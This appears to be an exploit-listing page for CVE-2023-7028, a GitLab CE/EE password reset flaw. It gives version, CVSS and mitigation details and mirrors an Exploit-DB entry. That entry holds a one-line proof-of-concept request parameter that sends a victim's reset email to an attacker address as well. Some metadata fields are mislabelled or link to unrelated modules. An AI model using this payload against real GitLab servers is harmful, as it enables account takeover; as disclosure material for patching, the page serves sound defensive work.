header-logo
Suggest Exploit
vendor:
GitLab CE/EE
by:
Sebastian Kriesten
6.1
CVSS
HIGH
Password Reset Vulnerability
862
CWE
Product Name: GitLab CE/EE
Affected Version From: GitLab CE/EE < 16.7.2, < 16.6.4, < 16.5.6
Affected Version To: 16.7.1 and below
Patch Exists: YES
Related CWE: CVE-2023-7028
CPE: a:gitlab:gitlab
Metasploit: https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2023-7028/https://www.rapid7.com/db/vulnerabilities/gitlab-gitlab-cve-2023-7028/
Other Scripts: https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/multi/http/phpmyadmin_null_termination_exec
Platforms Tested:
2024

GitLab CE/EE < 16.7.2 - Password Reset

The vulnerability in GitLab CE/EE versions prior to 16.7.2 allows an attacker to perform a password reset on a user account without proper authorization. This could lead to unauthorized access to user accounts.

Mitigation:

To mitigate this vulnerability, users are advised to update GitLab CE/EE to version 16.7.2 or later.
Source

Exploit-DB raw data:

# Exploit Title: GitLab CE/EE < 16.7.2 - Password Reset
# Exploit Author: Sebastian Kriesten (0xB455)
# Twitter: https://twitter.com/0xB455

# Date: 2024-01-12
# Vendor Homepage: gitlab.com
# Vulnerability disclosure: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
# Version: <16.7.2, <16.6.4, <16.5.6
# CVE: CVE-2023-7028

Proof of Concept:
user[email][]=valid@email.com&user[email][]=attacker@email.com

Navigation

Suggest Exploit

Services By CQR